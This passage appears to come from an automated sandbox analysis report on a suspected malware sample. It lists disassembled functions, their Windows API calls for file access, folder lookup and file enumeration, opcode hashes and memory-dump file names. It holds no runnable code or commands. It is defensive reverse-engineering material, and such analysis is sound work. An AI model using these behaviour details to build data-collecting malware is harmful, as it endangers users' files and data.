                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: a80a7bc89388122257d191de5dfa1ddbe3602b097055afe82f71fd27a12c1260
                                      • Instruction ID: b2cbbb64e66114d0add70495e7214f327d8e91594af135f40660783499d2e326
                                      • Opcode Fuzzy Hash: a80a7bc89388122257d191de5dfa1ddbe3602b097055afe82f71fd27a12c1260
                                      • Instruction Fuzzy Hash: 21113CB2D08218ABCB14DFD9DD45BBEB7B8FB4CB11F10421AF609A6280D3795940C7B4
                                      Function 00A49470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00A43D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00A43D3E,?), ref: 00A4948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00A43D3E), ref: 00A494A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00A494B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: c2f6db9c465e3b6db10d0a053273d2642b183a1325e219422880fed818ca6f03
                                      • Instruction ID: 1f47cf89a3ca31ae3c9fcdd9cc5d13aef9ae0ca0d2e7c03424cb8226cd7b5869
                                      • Opcode Fuzzy Hash: c2f6db9c465e3b6db10d0a053273d2642b183a1325e219422880fed818ca6f03
                                      • Instruction Fuzzy Hash: 72F03C39E04308BBDB10DBB0EC49F9F77B9AB88710F10C654FA19EB2C0D674A6118B90
                                      Function 00A4CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00A4CA7E
                                        • Part of subcall function 00A4C2A0: __amsg_exit.LIBCMT ref: 00A4C2B0
                                      • __getptd.LIBCMT ref: 00A4CA95
                                      • __amsg_exit.LIBCMT ref: 00A4CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00A4CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 0fea8a67276ac3e3df9bf1fcf14a244d2c1779e4c4c85ca263a09efbf190970f
                                      • Instruction ID: b7a6550870d2c29c8b0b41bb1c21316a396b37b1d9a5ee9f17c810b60cdfaa25
                                      • Opcode Fuzzy Hash: 0fea8a67276ac3e3df9bf1fcf14a244d2c1779e4c4c85ca263a09efbf190970f
                                      • Instruction Fuzzy Hash: A3F02B3D9563149BD7A0FBF8490374E33A1BFC0771F100159F508561C3DBA458408B91
                                      Function 00AB04D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: ae846d8b75fc498aeca4d55ef5f3bf1ac55218501ec02c42b04e73267d4abead
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: 0B414971900209AFDF26DF98DD81EEEBBB9BF48304F188199F90567252D3359990DF50
                                      Function 00A45190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A451CA
                                      • lstrcat.KERNEL32(?,00A51058), ref: 00A451E7
                                      • lstrcat.KERNEL32(?,01318928), ref: 00A451FB
                                      • lstrcat.KERNEL32(?,00A5105C), ref: 00A4520D
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44B7C
                                        • Part of subcall function 00A44B60: FindFirstFileA.KERNEL32(?,?), ref: 00A44B93
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC4), ref: 00A44BC1
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC8), ref: 00A44BD7
                                        • Part of subcall function 00A44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00A44DCD
                                        • Part of subcall function 00A44B60: FindClose.KERNEL32(000000FF), ref: 00A44DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 83c54245e91384a988a93e1a8f2f96761222966e8b70a38722baf2ee8c34b61c
                                      • Instruction ID: 86b068dfcf39dc26589f951855873775cf077ee8063e509bab8f5a8848d874c8
                                      • Opcode Fuzzy Hash: 83c54245e91384a988a93e1a8f2f96761222966e8b70a38722baf2ee8c34b61c
                                      • Instruction Fuzzy Hash: DF21CC7A900308ABDB14FBB0ED56FED333CAB94301F004554B659D6191EE74AACCCBA1